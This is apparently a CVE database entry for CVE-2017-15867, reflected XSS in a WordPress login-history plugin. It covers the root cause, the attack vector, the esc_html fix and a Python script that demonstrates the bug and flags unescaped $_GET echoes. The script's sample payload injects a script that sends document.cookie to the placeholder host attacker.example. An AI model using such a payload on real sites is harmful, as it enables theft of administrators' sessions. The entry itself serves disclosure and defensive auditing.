CVE-2017-15867
Description
Multiple cross-site scripting (XSS) vulnerabilities in the user-login-history plugin through 1.5.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) date_from, (2) date_to, (3) user_id, (4) username, (5) country_name, (6) browser, (7) operating_system, or (8) ip_address parameter to admin/partials/listing/listing.php.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- cpe:2.3:a:user-login-history_project:user-login-history:*:*:*:*:*:wordpress:*:* (Range: <=1.5.2)
Patches
Vulnerability mechanics
Root cause
"Missing output escaping of user-supplied query parameters in the plugin's listing templates allows reflected cross-site scripting."
Attack vector
An unauthenticated attacker can craft a URL containing malicious JavaScript in any of the listed query parameters (e.g., `date_from`, `username`, `ip_address`) and trick a logged-in WordPress administrator into visiting that link. Because the plugin outputs the parameter values directly into the HTML without escaping, the injected script executes in the context of the admin's session. This is a classic reflected cross-site scripting (XSS) attack [CWE-79].
Affected code
The vulnerability exists in `admin/partials/listing/listing.php` and `public/partials/listing/listing.php`. These files directly output user-supplied `$_GET` parameters (such as `date_from`, `date_to`, `user_id`, `username`, `country_name`, `browser`, `operating_system`, and `ip_address`) into HTML `value` attributes without any sanitization or escaping. [patch_id=6628829]
What the fix does
The patch wraps every `$_GET` parameter output in `esc_html()` (e.g., `esc_html($_GET['date_from'])`), which encodes `&`, `<`, `>`, `"` and `'` and therefore prevents both tag injection and breaking out of the double-quoted `value` attribute; `esc_attr()` is the WordPress convention for attribute context, but since both functions escape quotes the fix is effective as written. Additionally, the public listing form's `action` attribute was changed from `$_SERVER['REQUEST_URI']` to an empty string, and a cancel/reset link was added, so an attacker-controlled request URI is no longer reflected into the form. [patch_id=6628829]
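As an added illustration (not code from this page, the plugin, or its fix commit), the following Python script models the two render paths described above, the unescaped pre-patch output and the `esc_html()`-style output, and adds a grep-grade audit heuristic for the same bug class. The template strings, the `esc_html` stand-in built on Python's `html.escape`, the payload, the hostname and the PHP sample lines are all constructed for this example.

```python
"""Added example: models the reflected XSS in the listing templates and the
esc_html()-style fix. Nothing here is taken from the plugin; the templates,
the payload and the esc_html stand-in are constructed for illustration."""
import html
import re

# The eight query parameters named in the CVE description.
LISTING_PARAMS = (
    "date_from", "date_to", "user_id", "username",
    "country_name", "browser", "operating_system", "ip_address",
)


def esc_html(value: str) -> str:
    """Stand-in for WordPress esc_html() (assumption: the real function also
    normalises invalid UTF-8 first). Encodes &, <, >, " and ' so the value can
    neither close a double-quoted attribute nor open a tag."""
    return html.escape(value, quote=True)


def render_filter_field(name: str, raw_value: str, escape: bool) -> str:
    """Render one search filter the way the listing templates do: the $_GET
    value lands inside a double-quoted value attribute. escape=False is the
    vulnerable (pre-patch) behaviour, escape=True the patched one."""
    shown = esc_html(raw_value) if escape else raw_value
    return f'<input type="text" name="{name}" value="{shown}">'


def render_listing_form(query: dict, escape: bool) -> str:
    """Render the whole filter form for a parsed query string."""
    fields = [render_filter_field(p, query.get(p, ""), escape) for p in LISTING_PARAMS]
    return '<form method="get">\n' + "\n".join(fields) + "\n</form>"


# Constructed attacker value: closes the value attribute and the <input> tag,
# then injects a script element (the hostname is a placeholder).
PAYLOAD = '"><script>location="https://attacker.example/?c="+document.cookie</script>'


def injected_script_count(rendered_html: str) -> int:
    """Count <script> start tags that reached the output unencoded."""
    return len(re.findall(r"<script\b", rendered_html, flags=re.IGNORECASE))


# --- Source-audit heuristic for the same bug class --------------------------
# Flags lines that echo a $_GET element without an esc_* call in the same
# expression. A grep-grade check, not a parser: it misses multi-line
# statements and values that were escaped earlier into a variable.
ECHO_GET = re.compile(r"(?:\becho\b|\bprint\b|<\?=)\s*(?P<expr>[^;?]*\$_GET\[[^\]]+\][^;?]*)")
ESCAPED = re.compile(r"\besc_(?:html|attr|url|js|textarea)\s*\(")


def find_unescaped_get_echoes(php_source: str) -> list:
    """Return 1-based line numbers of unescaped $_GET echoes."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        m = ECHO_GET.search(line)
        if m and not ESCAPED.search(m.group("expr")):
            hits.append(lineno)
    return hits


# Constructed PHP snippet in the style of the affected template: lines 1 and 3
# echo the raw parameter, line 2 shows the patched form.
SAMPLE_TEMPLATE = """<input type="text" name="date_from" value="<?php echo $_GET['date_from']; ?>">
<input type="text" name="username" value="<?php echo esc_html($_GET['username']); ?>">
<input type="text" name="ip_address" value="<?= $_GET['ip_address'] ?>">"""


if __name__ == "__main__":
    query = {p: PAYLOAD for p in LISTING_PARAMS}
    print("unescaped:", injected_script_count(render_listing_form(query, escape=False)), "script tags")
    print("escaped:  ", injected_script_count(render_listing_form(query, escape=True)), "script tags")
    print("unescaped echo lines:", find_unescaped_get_echoes(SAMPLE_TEMPLATE))
```

Run stand-alone, the script reports eight injected script tags for the unescaped form and zero for the escaped one, and flags lines 1 and 3 of the sample template. The audit regex is deliberately narrow; treat its output as a starting point for manual review rather than proof that a template is clean.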
Preconditions
- input: The attacker must trick a logged-in WordPress administrator into clicking a crafted link containing malicious query parameters.
- auth: The victim must be authenticated to the WordPress admin area where the plugin's listing page is accessible.
- network: No special network position is required; the attack is performed over HTTP/HTTPS.
Generated on Jun 20, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/faiyazalam/WordPress-plugin-user-login-history/commit/519341a7dece59e2c589b908a636e6cf12a61741 (NVD: Patch, Third Party Advisory)
- wpvulndb.com/vulnerabilities/8939 (NVD: Third Party Advisory)
News mentions
No linked articles in our index yet.